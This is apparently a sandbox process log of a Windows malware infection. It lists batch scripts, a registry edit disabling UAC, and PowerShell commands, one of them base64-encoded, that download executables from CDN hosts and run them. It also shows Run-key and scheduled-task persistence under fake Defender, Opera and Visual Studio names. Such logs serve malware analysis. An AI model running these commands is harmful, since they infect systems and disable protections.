C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Users\Admin\AppData\Local\Temp\DomrGLks3k.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Users\Admin\AppData\Local\Temp\Pcg1cjpFnk.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Users\Admin\AppData\Local\Temp\ztMmUa8afO.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Users\Admin\AppData\Local\Temp\aY2woVA23K.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Users\Admin\AppData\Local\Temp\iEwFLK0FEN.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Users\Admin\AppData\Local\Temp\j8AtVjFO2q.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6088 -ip 6088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 808

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network


Files
